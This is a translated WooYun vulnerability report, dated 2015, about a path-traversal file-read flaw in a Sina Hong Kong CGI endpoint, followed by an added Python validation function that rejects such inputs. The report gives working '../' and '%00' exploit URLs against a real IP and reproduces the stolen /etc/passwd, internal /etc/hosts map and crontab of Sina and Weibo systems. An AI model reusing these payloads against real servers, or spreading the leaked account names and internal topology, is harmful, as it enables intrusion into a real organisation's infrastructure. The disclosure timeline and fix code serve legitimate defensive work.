WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles, online reader--------http://drop.zone.ci/
2015-06-24: Details sent to the vendor, awaiting vendor handling
2015-06-24: Vendor confirmed; details disclosed to the vendor only
2015-07-04: Details disclosed to core white hats and relevant domain experts
2015-07-14: Details disclosed to regular white hats
2015-07-24: Details disclosed to intern white hats
2015-08-08: Details disclosed to the public
Arbitrary file read vulnerability on a Sina subsite
http://218.213.85.103/cgi-bin/api/sb/hottest_news.cgi?c=../../../../../../../../../../etc/passwd%00&_=1435037199895
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:999:999:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
mysql:x:1000:1000::/home/mysql:/sbin/nologin
web:x:99:99::/home/web:/bin/bash
www:x:80:99::/home/www:/sbin/nologin
ftp_sync:x:1201:99::/usr/home/ftp_sync:/bin/bash
sinamgt:x:1202:99::/usr/home/sinamgt:/bin/bash
szewai:x:1203:99::/home/szewai:/bin/bash
james:x:1204:99::/home/james:/bin/bash
kenneth:x:1205:99::/home/kenneth:/bin/bash
faiho:x:1206:99::/home/faiho:/bin/bash
ice:x:1207:99::/home/ice:/bin/bash
winnie:x:1208:99::/home/winnie:/bin/bash
kaden:x:1209:99::/home/kaden:/bin/bash
nick:x:1210:99::/home/nick:/bin/bash
ryan:x:1211:99::/home/ryan:/bin/bash
uuidd:x:101:158:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
my3310:x:1212:1000::/data2/mysql3310:/sbin/nologin
couchbase:x:102:159:couchbase system user:/opt/couchbase:/bin/sh
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
memcached:x:103:160:Memcached daemon:/var/run/memcached:/sbin/nologin
tom:x:1213:99::/home/tom:/bin/bash
jeremy:x:1214:99::/home/jeremy:/bin/bash
heiyik:x:1215:99::/home/heiyik:/bin/bash
nagios:x:1216:1216::/home/nagios:/sbin/nologin
http://218.213.85.103/cgi-bin/api/sb/hottest_news.cgi?c=../../../../../../../../../../etc/hosts%00&_=1435037199895
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 sina235 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
10.254.254.139 archive
10.254.254.183 system.sina.com.hk systemsnetmnt.sina.com.hk
10.254.254.75 systems.internal.sina.com.hk
# local platform
# therefore we can use IP as domain
#127.0.0.1 wbp.internal.sina.com.hk
127.0.0.1 154.wbp.internal.sina.com.hk
10.254.254.155 155.wbp.internal.sina.com.hk
127.0.0.1 sme.sina.com.hk proxysme.sina.com.hk
127.0.0.1 soccer.sina.com.hk proxysoccer.sina.com.hk
127.0.0.1 eladies.sina.com.hk proxyeladies.sina.com.hk
127.0.0.1 travel.sina.com.hk proxytravel.sina.com.hk
10.254.254.224 proxyeladiesps.sina.com.hk
# slave server
#10.254.254.224 web-2.eladies.sina.com.hk
#10.254.254.224 web-2.travel.sina.com.hk
#10.254.254.224 web-2.sme.sina.com.hk
#10.254.254.224 web-2.sports.sina.com.hk
#10.254.254.222 yum.sina.com.hk
10.254.254.150 forum.eladies.hk
10.254.254.150 forum.eladies.sina.com.hk
10.254.254.76 www.eladies.hk
10.254.254.76 eladies.hk
# Channel
10.254.254.173 digital.sina.com.hk
10.254.254.173 travel.sina.com.hk
10.254.254.141 ent.sina.com.hk
10.254.254.148 game.sina.com.hk
10.254.254.215 news.sina.com.hk
10.254.254.136 eladies.sina.com.hk
10.254.254.148 basketball.sina.com.hk
10.254.254.127 finance.sina.com.hk
10.254.254.74 dictionary.sina.com.hk
10.254.254.135 sports.sina.com.hk
10.254.254.234 tv.sina.com.hk
# Common
10.254.254.172 weather.sina.com.hk
10.254.254.229 nw2.sina.com.hk
10.254.254.80 simg.sina.com.hk
10.254.254.182 img.sina.com.hk
10.254.254.177 rs.sinahk.net
10.254.254.175 rs2.sinahk.net
10.254.254.43 tool.sina.com.hk
10.254.254.43 tool43.sina.com.hk
10.254.254.141 site.search.sina.com.hk
#10.254.254.89 cap.internal.sina.com.hk
10.254.254.80 contentpool.sina.com.hk
10.254.254.181 gspsdb.sina.com.hk
10.254.254.233 tvdat.sina.com.hk
10.254.254.173 ads.sina.com.hk
10.254.254.140 ads.sina.com.hk
10.254.254.58 search.news.sina.com.hk
10.254.254.94 login.sina.com.hk
10.254.254.94 nz.sina.com.hk
10.254.254.149 soccer.sina.com.hk
10.254.254.141 ent.sina.com.hk
10.254.254.114 cs.sina.com.hk
10.254.254.183 pv.sina.com.hk
10.254.254.178 slide.sina.com.hk
10.254.254.178 admin.slide.sina.com.hk
10.254.254.61 hps.sina.com.hk
# System
10.254.254.75 ps.hk.weibo.com
10.254.254.75 admin.hk.weibo.com
10.254.254.183 psauth.sina.com.hk
# HK Weibo
10.254.254.50 hk.weibo.com
10.254.254.129 web-1.hk.weibo.com
10.254.254.130 web-2.hk.weibo.com
10.254.254.131 web-3.hk.weibo.com
10.254.254.16 db-m.hk.weibo.com
10.254.254.7 cron.hk.weibo.com
10.254.254.49 api.hk.weibo.com
#weibostatus
10.254.254.153 wbp.internal.sina.com.hk
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
#######################################################
#Duplicity Backup
######################################################
30 5 * * * root /bin/sh /etc/duplicity.sh
########## Server setting #############
@daily root /usr/bin/rdate -su stdtime.gov.hk
25 11,16,21 * * mon-fri root /root/utility/update_useragent_exclude_list.sh
#######################################
# Cleanup Session files
37 * * * * web /home/sinanet/ent/bin/crontab/clean_session.pl
1 4 * * * web find /home/sinanet/ent/temp/session/ps/* -amin +60 -exec rm -rf {} \;
# Clean outdated cache pag
1 3 * * * root perl /home/sinanet/ent/bin/ps/util/pcache.cgi > /dev/null 2>&1
###################################################################################
# eladies slave start
####################################################################################
# update nw_nclick and rsync the data file to master server
2 * * * * web perl /home/sinanet/ladies/bin/crontab/update_nw_nclick_201107.pl
5 * * * * web /usr/bin/rsync -avz /home/sinanet/ladies/data/nw/ 10.254.254.224::home_sinanet_eladies/data/nw/
## weather
*/3 * * * * web perl /home/sinanet/ladies/bin/crontab/weather_asjs.pl
## Cleanup Session files
37 * * * * web /home/sinanet/ladies/bin/crontab/clean_session.pl
1 4 * * * web find /home/sinanet/ladies/temp/session/ps/* -amin +60 -exec rm -rf {} \;
# Clean outdated cache pag
1 3 * * * root perl /home/sinanet/ladies/bin/ps/util/pcache.cgi > /dev/null 2>&1
###################################################################################
# eladies slave end
###################################################################################
Security filtering
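The reporter's one-line fix suggestion ("security filtering") in working code, as an added example that is not part of the original report and not Sina's CGI (the report does not show the script's source, so Python is used here rather than whatever the CGI was written in). The function takes the still URL-encoded `c` parameter, decodes it once the way a CGI library does, and returns a filesystem path only if it stays under a fixed directory. It closes both tricks visible in the report's URLs: the `../` segments and the trailing `%00`, whose NUL byte truncates the name in C-string based file APIs. `NEWS_ROOT`, the function names and the sample inputs are assumptions, not values from the report.

```python
import os
from urllib.parse import unquote_to_bytes

# Hypothetical directory the CGI is meant to serve news files from
# (an assumption for this example, not a path taken from the report).
NEWS_ROOT = "/var/www/news"


class BadPath(ValueError):
    """Raised when the requested name cannot be mapped to a file under the root."""


def resolve_news_file(raw_c: str, root: str = NEWS_ROOT) -> str:
    """Map the URL-encoded `c` parameter to an absolute path under `root`.

    Raises BadPath for anything that is not a plain relative file name made of
    ordinary path segments.  Checks run on the *decoded* bytes, because that is
    the value the file API would actually see.
    """
    value = unquote_to_bytes(raw_c)          # single decode, as a CGI library does
    if b"\x00" in value:                     # NUL is never part of a legitimate name;
        raise BadPath("NUL byte in parameter")  # this is the %00 truncation trick
    try:
        name = value.decode("utf-8")
    except UnicodeDecodeError:
        raise BadPath("parameter is not valid UTF-8") from None
    if not name or name.startswith("/") or "\\" in name:
        raise BadPath("absolute or malformed name")
    # Reject '..', '.' and empty segments outright instead of trying to
    # normalise them away; '%2e%2e' decodes to '..' and is caught here too.
    for segment in name.split("/"):
        if segment in ("", ".", ".."):
            raise BadPath("traversal segment in name")
    # Defence in depth: canonicalise (follows symlinks) and confirm containment.
    root_real = os.path.realpath(root)
    full = os.path.realpath(os.path.join(root_real, name))
    if os.path.commonpath([root_real, full]) != root_real:
        raise BadPath("resolved path escapes the root")
    return full


def is_safe_news_param(raw_c: str, root: str = NEWS_ROOT) -> bool:
    """Boolean wrapper handy for logging or unit tests."""
    try:
        resolve_news_file(raw_c, root)
        return True
    except BadPath:
        return False


if __name__ == "__main__":
    # Constructed sample inputs: the two rejected ones reuse the forms from the
    # report's URLs; the accepted one is a plausible relative file name.
    for raw in ("../../../../../../../../../../etc/passwd%00",
                "%2e%2e/%2e%2e/etc/hosts",
                "2015/hottest.json"):
        print(f"{raw!r:50} -> {'accept' if is_safe_news_param(raw) else 'reject'}")
```

The segment check alone would already stop the report's payloads; the `realpath` containment check is kept so that a symlink placed under the root, or a future change to how `name` is built, still cannot lead outside it. A request that fails the check is worth logging with the raw parameter value, since `..` sequences and `%00` in a file-name parameter are a reliable signal of probing.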
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-06-24 13:35
Thank you for your attention to Sina security; the security issue is being fixed.
None yet